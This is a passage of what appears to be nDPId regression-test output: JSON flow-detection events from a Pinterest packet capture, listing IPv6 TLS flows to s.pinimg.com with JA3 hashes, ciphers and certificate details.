-00946{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":99,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605289714142,"flow_last_seen":1605289714181,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605289714181,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::84","src_port":38516,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"s.pinimg.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00947{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":100,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605289714142,"flow_last_seen":1605289714182,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605289714182,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::84","src_port":38514,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"s.pinimg.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00947{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":101,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605289714142,"flow_last_seen":1605289714182,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605289714182,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::84","src_port":38522,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"s.pinimg.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00947{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":102,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605289714142,"flow_last_seen":1605289714182,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605289714182,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::84","src_port":38520,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"s.pinimg.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -01003{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":104,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605289714142,"flow_last_seen":1605289714204,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":1905,"flow_avg_l4_payload_len":317,"midstream":0,"thread_ts_msec":1605289714204,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::84","src_port":38512,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"s.pinimg.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -02783{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":107,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1605289714142,"flow_last_seen":1605289714204,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":5839,"flow_avg_l4_payload_len":648,"midstream":0,"thread_ts_msec":1605289714204,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::84","src_port":38512,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"s.pinimg.com","server_names":"*.pinterest.com,pinterest.in,*.pinterest.co,pinterest.co,*.pinterest.pe,pinterest.pe,*.pinterest.be,pinterest.be,*.pinterest.in,*.pinterest.ph,*.pinterest.ec,pinterest.ph,*.pinterest.cl,*.pinimg.com,*.pinterest.es,pinterest.es,*.pinterest.nz,pinterest.nz,pinterest.ec,pinterest.hu,pinterest.ca,pinterest.id,*.pinterest.nl,pinterest.nl,*.pinterest.tw,pinterest.tw,*.pinterest.th,pinterest.th,*.pinterest.id,*.pinterest.vn,*.pinterest.hu,pinterest.vn,*.pinterest.uk,pinterest.uk,*.pinterest.ru,pinterest.ru,*.pinterest.it,pinterest.it,pinterest.fr,pinterest.cl,*.pinterest.fr,*.pinterest.jp,*.pinterest.ca,pinterest.com,pin.it,*.pinterest.se,*.pinterest.pt,*.pinterest.mx,*.pinterest.kr,*.pinterest.ie,pinterest.engineering,*.pinterest.dk,*.pinterest.de,*.pinterest.ch,*.pinterest.at,*.pinterestmail.com,*.pinterest.engineering,*.pinterest.info,pinterest.info,pinimg.com,pinterestmail.com,pinterest.de,pinterest.dk,pinterest.ie,pinterest.jp,pinterest.kr,pinterest.mx,pinterest.pt,pinterest.se,pinterest.at,pinterest.ch,pinterest.co.at,*.pinterest.com.uy,pinterest.co.kr,pinterest.co.uk,*.pinterest.com.au,pinterest.com.au,pinterest.com.mx,*.pinterest.co.nz,pinterest.co.nz,pinterest.com.pe,pinterest.com.uy,*.pinterest.co.in,pinterest.com.py,*.pinterest.com.py,pinterest.com.bo,*.pinterest.com.bo,pinterest.com.ec,*.pinterest.com.ec,pinterest.co.in,*.pinterest.com.pe,*.pinterest.com.mx,pinterest.com.vn,*.pinterest.com.vn,*.pinterest.co.uk,*.pinterest.co.kr,*.pinterest.co.at,*.testing.pinterest.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert SHA2 High Assurance Server CA","subjectDN":"C=US, ST=California, L=San Francisco, O=Pinterest, Inc., CN=*.pinterest.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"1E:D0:5D:9F:0D:82:46:B3:60:5F:11:FB:64:D5:28:35:37:40:7A:4E"}} -01003{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":127,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1605289714142,"flow_last_seen":1605289714229,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":1905,"flow_avg_l4_payload_len":272,"midstream":0,"thread_ts_msec":1605289714229,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::84","src_port":38518,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"s.pinimg.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -02784{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":131,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1605289714142,"flow_last_seen":1605289714229,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":5839,"flow_avg_l4_payload_len":583,"midstream":0,"thread_ts_msec":1605289714229,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::84","src_port":38518,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"s.pinimg.com","server_names":"*.pinterest.com,pinterest.in,*.pinterest.co,pinterest.co,*.pinterest.pe,pinterest.pe,*.pinterest.be,pinterest.be,*.pinterest.in,*.pinterest.ph,*.pinterest.ec,pinterest.ph,*.pinterest.cl,*.pinimg.com,*.pinterest.es,pinterest.es,*.pinterest.nz,pinterest.nz,pinterest.ec,pinterest.hu,pinterest.ca,pinterest.id,*.pinterest.nl,pinterest.nl,*.pinterest.tw,pinterest.tw,*.pinterest.th,pinterest.th,*.pinterest.id,*.pinterest.vn,*.pinterest.hu,pinterest.vn,*.pinterest.uk,pinterest.uk,*.pinterest.ru,pinterest.ru,*.pinterest.it,pinterest.it,pinterest.fr,pinterest.cl,*.pinterest.fr,*.pinterest.jp,*.pinterest.ca,pinterest.com,pin.it,*.pinterest.se,*.pinterest.pt,*.pinterest.mx,*.pinterest.kr,*.pinterest.ie,pinterest.engineering,*.pinterest.dk,*.pinterest.de,*.pinterest.ch,*.pinterest.at,*.pinterestmail.com,*.pinterest.engineering,*.pinterest.info,pinterest.info,pinimg.com,pinterestmail.com,pinterest.de,pinterest.dk,pinterest.ie,pinterest.jp,pinterest.kr,pinterest.mx,pinterest.pt,pinterest.se,pinterest.at,pinterest.ch,pinterest.co.at,*.pinterest.com.uy,pinterest.co.kr,pinterest.co.uk,*.pinterest.com.au,pinterest.com.au,pinterest.com.mx,*.pinterest.co.nz,pinterest.co.nz,pinterest.com.pe,pinterest.com.uy,*.pinterest.co.in,pinterest.com.py,*.pinterest.com.py,pinterest.com.bo,*.pinterest.com.bo,pinterest.com.ec,*.pinterest.com.ec,pinterest.co.in,*.pinterest.com.pe,*.pinterest.com.mx,pinterest.com.vn,*.pinterest.com.vn,*.pinterest.co.uk,*.pinterest.co.kr,*.pinterest.co.at,*.testing.pinterest.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert SHA2 High Assurance Server CA","subjectDN":"C=US, ST=California, L=San Francisco, O=Pinterest, Inc., CN=*.pinterest.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"1E:D0:5D:9F:0D:82:46:B3:60:5F:11:FB:64:D5:28:35:37:40:7A:4E"}} -01003{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":134,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1605289714142,"flow_last_seen":1605289714229,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":1905,"flow_avg_l4_payload_len":272,"midstream":0,"thread_ts_msec":1605289714229,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::84","src_port":38516,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"s.pinimg.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -01003{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":135,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1605289714142,"flow_last_seen":1605289714229,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":1905,"flow_avg_l4_payload_len":272,"midstream":0,"thread_ts_msec":1605289714229,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::84","src_port":38522,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"s.pinimg.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -02784{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":138,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1605289714142,"flow_last_seen":1605289714229,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":5839,"flow_avg_l4_payload_len":583,"midstream":0,"thread_ts_msec":1605289714229,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::84","src_port":38522,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"s.pinimg.com","server_names":"*.pinterest.com,pinterest.in,*.pinterest.co,pinterest.co,*.pinterest.pe,pinterest.pe,*.pinterest.be,pinterest.be,*.pinterest.in,*.pinterest.ph,*.pinterest.ec,pinterest.ph,*.pinterest.cl,*.pinimg.com,*.pinterest.es,pinterest.es,*.pinterest.nz,pinterest.nz,pinterest.ec,pinterest.hu,pinterest.ca,pinterest.id,*.pinterest.nl,pinterest.nl,*.pinterest.tw,pinterest.tw,*.pinterest.th,pinterest.th,*.pinterest.id,*.pinterest.vn,*.pinterest.hu,pinterest.vn,*.pinterest.uk,pinterest.uk,*.pinterest.ru,pinterest.ru,*.pinterest.it,pinterest.it,pinterest.fr,pinterest.cl,*.pinterest.fr,*.pinterest.jp,*.pinterest.ca,pinterest.com,pin.it,*.pinterest.se,*.pinterest.pt,*.pinterest.mx,*.pinterest.kr,*.pinterest.ie,pinterest.engineering,*.pinterest.dk,*.pinterest.de,*.pinterest.ch,*.pinterest.at,*.pinterestmail.com,*.pinterest.engineering,*.pinterest.info,pinterest.info,pinimg.com,pinterestmail.com,pinterest.de,pinterest.dk,pinterest.ie,pinterest.jp,pinterest.kr,pinterest.mx,pinterest.pt,pinterest.se,pinterest.at,pinterest.ch,pinterest.co.at,*.pinterest.com.uy,pinterest.co.kr,pinterest.co.uk,*.pinterest.com.au,pinterest.com.au,pinterest.com.mx,*.pinterest.co.nz,pinterest.co.nz,pinterest.com.pe,pinterest.com.uy,*.pinterest.co.in,pinterest.com.py,*.pinterest.com.py,pinterest.com.bo,*.pinterest.com.bo,pinterest.com.ec,*.pinterest.com.ec,pinterest.co.in,*.pinterest.com.pe,*.pinterest.com.mx,pinterest.com.vn,*.pinterest.com.vn,*.pinterest.co.uk,*.pinterest.co.kr,*.pinterest.co.at,*.testing.pinterest.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert SHA2 High Assurance Server CA","subjectDN":"C=US, ST=California, L=San Francisco, O=Pinterest, Inc., CN=*.pinterest.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"1E:D0:5D:9F:0D:82:46:B3:60:5F:11:FB:64:D5:28:35:37:40:7A:4E"}} -01003{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":141,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1605289714142,"flow_last_seen":1605289714229,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":1905,"flow_avg_l4_payload_len":272,"midstream":0,"thread_ts_msec":1605289714229,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::84","src_port":38514,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"s.pinimg.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -02784{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":149,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":13,"flow_first_seen":1605289714142,"flow_last_seen":1605289714230,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":5839,"flow_avg_l4_payload_len":449,"midstream":0,"thread_ts_msec":1605289714230,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::84","src_port":38516,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"s.pinimg.com","server_names":"*.pinterest.com,pinterest.in,*.pinterest.co,pinterest.co,*.pinterest.pe,pinterest.pe,*.pinterest.be,pinterest.be,*.pinterest.in,*.pinterest.ph,*.pinterest.ec,pinterest.ph,*.pinterest.cl,*.pinimg.com,*.pinterest.es,pinterest.es,*.pinterest.nz,pinterest.nz,pinterest.ec,pinterest.hu,pinterest.ca,pinterest.id,*.pinterest.nl,pinterest.nl,*.pinterest.tw,pinterest.tw,*.pinterest.th,pinterest.th,*.pinterest.id,*.pinterest.vn,*.pinterest.hu,pinterest.vn,*.pinterest.uk,pinterest.uk,*.pinterest.ru,pinterest.ru,*.pinterest.it,pinterest.it,pinterest.fr,pinterest.cl,*.pinterest.fr,*.pinterest.jp,*.pinterest.ca,pinterest.com,pin.it,*.pinterest.se,*.pinterest.pt,*.pinterest.mx,*.pinterest.kr,*.pinterest.ie,pinterest.engineering,*.pinterest.dk,*.pinterest.de,*.pinterest.ch,*.pinterest.at,*.pinterestmail.com,*.pinterest.engineering,*.pinterest.info,pinterest.info,pinimg.com,pinterestmail.com,pinterest.de,pinterest.dk,pinterest.ie,pinterest.jp,pinterest.kr,pinterest.mx,pinterest.pt,pinterest.se,pinterest.at,pinterest.ch,pinterest.co.at,*.pinterest.com.uy,pinterest.co.kr,pinterest.co.uk,*.pinterest.com.au,pinterest.com.au,pinterest.com.mx,*.pinterest.co.nz,pinterest.co.nz,pinterest.com.pe,pinterest.com.uy,*.pinterest.co.in,pinterest.com.py,*.pinterest.com.py,pinterest.com.bo,*.pinterest.com.bo,pinterest.com.ec,*.pinterest.com.ec,pinterest.co.in,*.pinterest.com.pe,*.pinterest.com.mx,pinterest.com.vn,*.pinterest.com.vn,*.pinterest.co.uk,*.pinterest.co.kr,*.pinterest.co.at,*.testing.pinterest.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert SHA2 High Assurance Server CA","subjectDN":"C=US, ST=California, L=San Francisco, O=Pinterest, Inc., CN=*.pinterest.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"1E:D0:5D:9F:0D:82:46:B3:60:5F:11:FB:64:D5:28:35:37:40:7A:4E"}} -02784{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":150,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":11,"flow_first_seen":1605289714142,"flow_last_seen":1605289714230,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":5839,"flow_avg_l4_payload_len":530,"midstream":0,"thread_ts_msec":1605289714230,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::84","src_port":38514,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"s.pinimg.com","server_names":"*.pinterest.com,pinterest.in,*.pinterest.co,pinterest.co,*.pinterest.pe,pinterest.pe,*.pinterest.be,pinterest.be,*.pinterest.in,*.pinterest.ph,*.pinterest.ec,pinterest.ph,*.pinterest.cl,*.pinimg.com,*.pinterest.es,pinterest.es,*.pinterest.nz,pinterest.nz,pinterest.ec,pinterest.hu,pinterest.ca,pinterest.id,*.pinterest.nl,pinterest.nl,*.pinterest.tw,pinterest.tw,*.pinterest.th,pinterest.th,*.pinterest.id,*.pinterest.vn,*.pinterest.hu,pinterest.vn,*.pinterest.uk,pinterest.uk,*.pinterest.ru,pinterest.ru,*.pinterest.it,pinterest.it,pinterest.fr,pinterest.cl,*.pinterest.fr,*.pinterest.jp,*.pinterest.ca,pinterest.com,pin.it,*.pinterest.se,*.pinterest.pt,*.pinterest.mx,*.pinterest.kr,*.pinterest.ie,pinterest.engineering,*.pinterest.dk,*.pinterest.de,*.pinterest.ch,*.pinterest.at,*.pinterestmail.com,*.pinterest.engineering,*.pinterest.info,pinterest.info,pinimg.com,pinterestmail.com,pinterest.de,pinterest.dk,pinterest.ie,pinterest.jp,pinterest.kr,pinterest.mx,pinterest.pt,pinterest.se,pinterest.at,pinterest.ch,pinterest.co.at,*.pinterest.com.uy,pinterest.co.kr,pinterest.co.uk,*.pinterest.com.au,pinterest.com.au,pinterest.com.mx,*.pinterest.co.nz,pinterest.co.nz,pinterest.com.pe,pinterest.com.uy,*.pinterest.co.in,pinterest.com.py,*.pinterest.com.py,pinterest.com.bo,*.pinterest.com.bo,pinterest.com.ec,*.pinterest.com.ec,pinterest.co.in,*.pinterest.com.pe,*.pinterest.com.mx,pinterest.com.vn,*.pinterest.com.vn,*.pinterest.co.uk,*.pinterest.co.kr,*.pinterest.co.at,*.testing.pinterest.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert SHA2 High Assurance Server CA","subjectDN":"C=US, ST=California, L=San Francisco, O=Pinterest, Inc., CN=*.pinterest.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"1E:D0:5D:9F:0D:82:46:B3:60:5F:11:FB:64:D5:28:35:37:40:7A:4E"}} -01003{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":151,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1605289714142,"flow_last_seen":1605289714230,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":1905,"flow_avg_l4_payload_len":272,"midstream":0,"thread_ts_msec":1605289714230,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::84","src_port":38520,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"s.pinimg.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -02784{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":154,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1605289714142,"flow_last_seen":1605289714230,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":5839,"flow_avg_l4_payload_len":583,"midstream":0,"thread_ts_msec":1605289714230,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::84","src_port":38520,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"s.pinimg.com","server_names":"*.pinterest.com,pinterest.in,*.pinterest.co,pinterest.co,*.pinterest.pe,pinterest.pe,*.pinterest.be,pinterest.be,*.pinterest.in,*.pinterest.ph,*.pinterest.ec,pinterest.ph,*.pinterest.cl,*.pinimg.com,*.pinterest.es,pinterest.es,*.pinterest.nz,pinterest.nz,pinterest.ec,pinterest.hu,pinterest.ca,pinterest.id,*.pinterest.nl,pinterest.nl,*.pinterest.tw,pinterest.tw,*.pinterest.th,pinterest.th,*.pinterest.id,*.pinterest.vn,*.pinterest.hu,pinterest.vn,*.pinterest.uk,pinterest.uk,*.pinterest.ru,pinterest.ru,*.pinterest.it,pinterest.it,pinterest.fr,pinterest.cl,*.pinterest.fr,*.pinterest.jp,*.pinterest.ca,pinterest.com,pin.it,*.pinterest.se,*.pinterest.pt,*.pinterest.mx,*.pinterest.kr,*.pinterest.ie,pinterest.engineering,*.pinterest.dk,*.pinterest.de,*.pinterest.ch,*.pinterest.at,*.pinterestmail.com,*.pinterest.engineering,*.pinterest.info,pinterest.info,pinimg.com,pinterestmail.com,pinterest.de,pinterest.dk,pinterest.ie,pinterest.jp,pinterest.kr,pinterest.mx,pinterest.pt,pinterest.se,pinterest.at,pinterest.ch,pinterest.co.at,*.pinterest.com.uy,pinterest.co.kr,pinterest.co.uk,*.pinterest.com.au,pinterest.com.au,pinterest.com.mx,*.pinterest.co.nz,pinterest.co.nz,pinterest.